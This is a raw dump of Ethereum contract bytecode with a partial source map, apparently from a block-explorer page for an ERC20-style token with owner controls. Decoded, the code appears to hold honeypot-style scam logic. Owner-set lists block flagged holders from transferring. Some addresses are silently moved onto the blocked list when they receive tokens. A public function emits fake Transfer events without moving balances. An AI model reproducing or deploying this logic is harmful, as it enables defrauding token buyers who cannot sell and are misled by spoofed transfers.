b600a5f8381526020019081526020015f205f82825461057991906119e0565b925050819055506001600b5f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555050565b6060600780546105e790611a40565b80601f016020809104026020016040519081016040528092919081815260200182805461061390611a40565b801561065e5780601f106106355761010080835404028352916020019161065e565b820191905f5260205f20905b81548152906001019060200180831161064157829003601f168201915b5050505050905090565b5f80610672610dc6565b905061067f818585610dcd565b600191505092915050565b5f600b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b6106e4610f90565b5f5b8282905081101561077f575f60025f85858581811061070857610707611a70565b5b905060200201602081019061071d919061179d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061077790611a9d565b9150506106e6565b505050565b5f600554905090565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f806107e9610dc6565b90506107f685828561100e565b610801858585611099565b60019150509392505050565b5f6012905090565b5f8061081f610dc6565b90506108408185856108318589610bff565b61083b91906119e0565b610dcd565b600191505092915050565b610853610f90565b5f5b828290508110156108ee575f60035f85858581811061087757610876611a70565b5b905060200201602081019061088c919061179d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555080806108e690611a9d565b915050610855565b505050565b6108fb610f90565b5f5b8282905081101561099757600160035f8585858181106109205761091f611a70565b5b9050602002016020810190610935919061179d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061098f90611a9d565b9150506108fd565b505050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6109ea610f90565b6109f35f6114f7565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060088054610a2b90611a40565b80601f0160208091040260200160405190810160405280929190818152602001828054610a5790611a40565b8015610aa25780601f10610a7957610100808354040283529160200191610aa2565b820191905f5260205f20905b815481529060010190602001808311610a8557829003601f168201915b5050505050905090565b5f80610ab6610dc6565b90505f610ac38286610bff565b905083811015610b08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aff90611b54565b60405180910390fd5b610b158286868403610dcd565b60019250505092915050565b5f80610b2b610dc6565b9050610b38818585611099565b600191505092915050565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610bf29190611883565b60405180910390a3505050565b5f60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610c89610f90565b5f5b82829050811015610d2557600160025f858585818110610cae57610cad611a70565b5b9050602002016020810190610cc3919061179d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610d1d90611a9d565b915050610c8b565b505050565b610d32610f90565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610da0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9790611be2565b60405180910390fd5b610da9816114f7565b50565b5f600a5f8381526020019081526020015f20549050919050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3290611c70565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ea9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea090611cfe565b60405180910390fd5b8060045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f839190611883565b60405180910390a3505050565b610f98610dc6565b73ffffffffffffffffffffffffffffffffffffffff16610fb66109f5565b73ffffffffffffffffffffffffffffffffffffffff161461100c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100390611d66565b60405180910390fd5b565b5f6110198484610bff565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110935781811015611085576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107c90611dce565b60405180910390fd5b6110928484848403610dcd565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611107576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110fe90611e5c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611175576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116c90611eea565b60405180910390fd5b6111808383836115b8565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015611204576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111fb90611f78565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168061132d575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15611388576001151560065f9054906101000a900460ff16151514611387576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137e90611fb9565b60405180910390fd5b5b60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615611481575f60035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516114de9190611883565b60405180910390a36114f18484846115bd565b50505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f80fd5b5f80fd5b5f819050919050565b6115dc816115ca565b81146115e6575f80fd5b50565b5f813590506115f7816115d3565b92915050565b5f60208284031215611612576116116115c2565b5b5f61161f848285016115e9565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561165f578082015181840152602081019050611644565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61168482611628565b61168e8185611632565b935061169e818560208601611642565b6116a78161166a565b840191505092915050565b5f6020820190508181035f8301526116ca818461167a565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6116fb826116d2565b9050919050565b61170b816116f1565b8114611715575f80fd5b50565b5f8135905061172681611702565b92915050565b5f8060408385031215611742576117416115c2565b5b5f61174f85828601611718565b9250506020611760858286016115e9565b9150509250929050565b5f8115159050919050565b61177e8161176a565b82525050565b5f6020820190506117975f830184611775565b92915050565b5f602082840312156117b2576117b16115c2565b5b5f6117bf84828501611718565b91505092915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126117e9576117e86117c8565b5b8235905067ffffffffffffffff811115611806576118056117cc565b5b602083019150836020820283011115611822576118216117d0565b5b9250929050565b5f806020838503121561183f5761183e6115c2565b5b5f83013567ffffffffffffffff81111561185c5761185b6115c6565b5b611868858286016117d4565b92509250509250929050565b61187d816115ca565b82525050565b5f6020820190506118965f830184611874565b92915050565b5f805f606084860312156118b3576118b26115c2565b5b5f6118c086828701611718565b93505060206118d186828701611718565b92505060406118e2868287016115e9565b9150509250925092565b5f60ff82169050919050565b611901816118ec565b82525050565b5f60208201905061191a5f8301846118f8565b92915050565b611929816116f1565b82525050565b5f6020820190506119425f830184611920565b92915050565b5f806040838503121561195e5761195d6115c2565b5b5f61196b85828601611718565b925050602061197c85828601611718565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52600160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6119ea826115ca565b91506119f5836115ca565b9250828201905080821115611a0d57611a0c6119b3565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611a5757607f821691505b602082108103611a6a57611a69611a13565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f611aa7826115ca565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611ad957611ad86119b3565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611b3e602583611632565b9150611b4982611ae4565b604082019050919050565b5f6020820190508181035f830152611b6b81611b32565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611bcc602683611632565b9150611bd782611b72565b604082019050919050565b5f6020820190508181035f830152611bf981611bc0565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611c5a602483611632565b9150611c6582611c00565b604082019050919050565b5f6020820190508181035f830152611c8781611c4e565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611ce8602283611632565b9150611cf382611c8e565b604082019050919050565b5f6020820190508181035f830152611d1581611cdc565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611d50602083611632565b9150611d5b82611d1c565b602082019050919050565b5f6020820190508181035f830152611d7d81611d44565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611db8601d83611632565b9150611dc382611d84565b602082019050919050565b5f6020820190508181035f830152611de581611dac565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611e46602583611632565b9150611e5182611dec565b604082019050919050565b5f6020820190508181035f830152611e7381611e3a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611ed4602383611632565b9150611edf82611e7a565b604082019050919050565b5f6020820190508181035f830152611f0181611ec8565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611f62602683611632565b9150611f6d82611f08565b604082019050919050565b5f6020820190508181035f830152611f8f81611f56565b9050919050565b50565b5f611fa45f83611632565b9150611faf82611f96565b5f82019050919050565b5f6020820190508181035f830152611fd081611f99565b905091905056fea2646970667358221220eae83b30615d452433142c5e435dae1173624962e655f53b125433b32eab2b1764736f6c63430008140033

Deployed Bytecode

0x608060405234801561000f575f80fd5b5060043610610156575f3560e01c806370a08231116100c1578063aec2ccae1161007a578063aec2ccae146103ea578063beabacc81461041a578063dd62ed3e14610436578063ed08132914610466578063f2fde38b14610482578063ff9810991461049e57610156565b806370a0823114610314578063715018a6146103445780638da5cb5b1461034e57806395d89b411461036c578063a457c2d71461038a578063a9059cbb146103ba57610156565b80631eb0ab83116101135780631eb0ab831461022e57806323b872dd1461025e578063313ce5671461028e57806339509351146102ac5780635a4c08f1146102dc57806366d3cf4d146102f857610156565b80630121b93f1461015a57806306fdde0314610176578063095ea7b31461019457806309eef43e146101c457806315bbda6d146101f457806318160ddd14610210575b5f80fd5b610174600480360381019061016f91906115fd565b6104ce565b005b61017e6105d8565b60405161018b91906116b2565b60405180910390f35b6101ae60048036038101906101a9919061172c565b610668565b6040516101bb9190611784565b60405180910390f35b6101de60048036038101906101d9919061179d565b61068a565b6040516101eb9190611784565b60405180910390f35b61020e60048036038101906102099190611829565b6106dc565b005b610218610784565b6040516102259190611883565b60405180910390f35b6102486004803603810190610243919061179d565b61078d565b6040516102559190611784565b60405180910390f35b6102786004803603810190610273919061189c565b6107df565b6040516102859190611784565b60405180910390f35b61029661080d565b6040516102a39190611907565b60405180910390f35b6102c660048036038101906102c1919061172c565b610815565b6040516102d39190611784565b60405180910390f35b6102f660048036038101906102f19190611829565b61084b565b005b610312600480360381019061030d9190611829565b6108f3565b005b61032e6004803603810190610329919061179d565b61099c565b60405161033b9190611883565b60405180910390f35b61034c6109e2565b005b6103566109f5565b604051610363919061192f565b60405180910390f35b610374610a1c565b60405161038191906116b2565b60405180910390f35b6103a4600480360381019061039f919061172c565b610aac565b6040516103b19190611784565b60405180910390f35b6103d460048036038101906103cf919061172c565b610b21565b6040516103e19190611784565b60405180910390f35b61040460048036038101906103ff919061179d565b610b43565b6040516104119190611784565b60405180910390f35b610434600480360381019061042f919061189c565b610b95565b005b610450600480360381019061044b9190611948565b610bff565b60405161045d9190611883565b60405180910390f35b610480600480360381019061047b9190611829565b610c81565b005b61049c6004803603810190610497919061179d565b610d2a565b005b6104b860048036038101906104b391906115fd565b610dac565b6040516104c59190611883565b60405180910390f35b600481106104df576104de611986565b5b600c546104eb3361099c565b116104f9576104f8611986565b5b600b5f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161561055157610550611986565b5b61055a3361099c565b600a5f8381526020019081526020015f205f82825461057991906119e0565b925050819055506001600b5f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555050565b6060600780546105e790611a40565b80601f016020809104026020016040519081016040528092919081815260200182805461061390611a40565b801561065e5780601f106106355761010080835404028352916020019161065e565b820191905f5260205f20905b81548152906001019060200180831161064157829003601f168201915b5050505050905090565b5f80610672610dc6565b905061067f818585610dcd565b600191505092915050565b5f600b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b6106e4610f90565b5f5b8282905081101561077f575f60025f85858581811061070857610707611a70565b5b905060200201602081019061071d919061179d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061077790611a9d565b9150506106e6565b505050565b5f600554905090565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f806107e9610dc6565b90506107f685828561100e565b610801858585611099565b60019150509392505050565b5f6012905090565b5f8061081f610dc6565b90506108408185856108318589610bff565b61083b91906119e0565b610dcd565b600191505092915050565b610853610f90565b5f5b828290508110156108ee575f60035f85858581811061087757610876611a70565b5b905060200201602081019061088c919061179d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555080806108e690611a9d565b915050610855565b505050565b6108fb610f90565b5f5b8282905081101561099757600160035f8585858181106109205761091f611a70565b5b9050602002016020810190610935919061179d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061098f90611a9d565b9150506108fd565b505050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6109ea610f90565b6109f35f6114f7565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060088054610a2b90611a40565b80601f0160208091040260200160405190810160405280929190818152602001828054610a5790611a40565b8015610aa25780601f10610a7957610100808354040283529160200191610aa2565b820191905f5260205f20905b815481529060010190602001808311610a8557829003601f168201915b5050505050905090565b5f80610ab6610dc6565b90505f610ac38286610bff565b905083811015610b08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aff90611b54565b60405180910390fd5b610b158286868403610dcd565b60019250505092915050565b5f80610b2b610dc6565b9050610b38818585611099565b600191505092915050565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610bf29190611883565b60405180910390a3505050565b5f60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610c89610f90565b5f5b82829050811015610d2557600160025f858585818110610cae57610cad611a70565b5b9050602002016020810190610cc3919061179d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610d1d90611a9d565b915050610c8b565b505050565b610d32610f90565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610da0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9790611be2565b60405180910390fd5b610da9816114f7565b50565b5f600a5f8381526020019081526020015f20549050919050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3290611c70565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ea9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea090611cfe565b60405180910390fd5b8060045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f839190611883565b60405180910390a3505050565b610f98610dc6565b73ffffffffffffffffffffffffffffffffffffffff16610fb66109f5565b73ffffffffffffffffffffffffffffffffffffffff161461100c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100390611d66565b60405180910390fd5b565b5f6110198484610bff565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110935781811015611085576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107c90611dce565b60405180910390fd5b6110928484848403610dcd565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611107576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110fe90611e5c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611175576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116c90611eea565b60405180910390fd5b6111808383836115b8565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015611204576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111fb90611f78565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168061132d575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15611388576001151560065f9054906101000a900460ff16151514611387576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137e90611fb9565b60405180910390fd5b5b60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615611481575f60035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516114de9190611883565b60405180910390a36114f18484846115bd565b50505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f80fd5b5f80fd5b5f819050919050565b6115dc816115ca565b81146115e6575f80fd5b50565b5f813590506115f7816115d3565b92915050565b5f60208284031215611612576116116115c2565b5b5f61161f848285016115e9565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561165f578082015181840152602081019050611644565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61168482611628565b61168e8185611632565b935061169e818560208601611642565b6116a78161166a565b840191505092915050565b5f6020820190508181035f8301526116ca818461167a565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6116fb826116d2565b9050919050565b61170b816116f1565b8114611715575f80fd5b50565b5f8135905061172681611702565b92915050565b5f8060408385031215611742576117416115c2565b5b5f61174f85828601611718565b9250506020611760858286016115e9565b9150509250929050565b5f8115159050919050565b61177e8161176a565b82525050565b5f6020820190506117975f830184611775565b92915050565b5f602082840312156117b2576117b16115c2565b5b5f6117bf84828501611718565b91505092915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126117e9576117e86117c8565b5b8235905067ffffffffffffffff811115611806576118056117cc565b5b602083019150836020820283011115611822576118216117d0565b5b9250929050565b5f806020838503121561183f5761183e6115c2565b5b5f83013567ffffffffffffffff81111561185c5761185b6115c6565b5b611868858286016117d4565b92509250509250929050565b61187d816115ca565b82525050565b5f6020820190506118965f830184611874565b92915050565b5f805f606084860312156118b3576118b26115c2565b5b5f6118c086828701611718565b93505060206118d186828701611718565b92505060406118e2868287016115e9565b9150509250925092565b5f60ff82169050919050565b611901816118ec565b82525050565b5f60208201905061191a5f8301846118f8565b92915050565b611929816116f1565b82525050565b5f6020820190506119425f830184611920565b92915050565b5f806040838503121561195e5761195d6115c2565b5b5f61196b85828601611718565b925050602061197c85828601611718565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52600160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6119ea826115ca565b91506119f5836115ca565b9250828201905080821115611a0d57611a0c6119b3565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611a5757607f821691505b602082108103611a6a57611a69611a13565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f611aa7826115ca565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611ad957611ad86119b3565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611b3e602583611632565b9150611b4982611ae4565b604082019050919050565b5f6020820190508181035f830152611b6b81611b32565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611bcc602683611632565b9150611bd782611b72565b604082019050919050565b5f6020820190508181035f830152611bf981611bc0565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611c5a602483611632565b9150611c6582611c00565b604082019050919050565b5f6020820190508181035f830152611c8781611c4e565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611ce8602283611632565b9150611cf382611c8e565b604082019050919050565b5f6020820190508181035f830152611d1581611cdc565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611d50602083611632565b9150611d5b82611d1c565b602082019050919050565b5f6020820190508181035f830152611d7d81611d44565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611db8601d83611632565b9150611dc382611d84565b602082019050919050565b5f6020820190508181035f830152611de581611dac565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611e46602583611632565b9150611e5182611dec565b604082019050919050565b5f6020820190508181035f830152611e7381611e3a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611ed4602383611632565b9150611edf82611e7a565b604082019050919050565b5f6020820190508181035f830152611f0181611ec8565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611f62602683611632565b9150611f6d82611f08565b604082019050919050565b5f6020820190508181035f830152611f8f81611f56565b9050919050565b50565b5f611fa45f83611632565b9150611faf82611f96565b5f82019050919050565b5f6020820190508181035f830152611fd081611f99565b905091905056fea2646970667358221220eae83b30615d452433142c5e435dae1173624962e655f53b125433b32eab2b1764736f6c63430008140033

Deployed Bytecode Sourcemap

203:889:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;562:271;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1000:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4354:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;956:100:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2706:174:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3165:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2995:110;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5113:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1937:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5794:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2218:181;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2034:178;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3329:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:0;;;:::i;:::-;;1834:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1211:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6515:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3650:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2886:103;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2583:117;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3897:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2405:171;;;;;;;;;;;;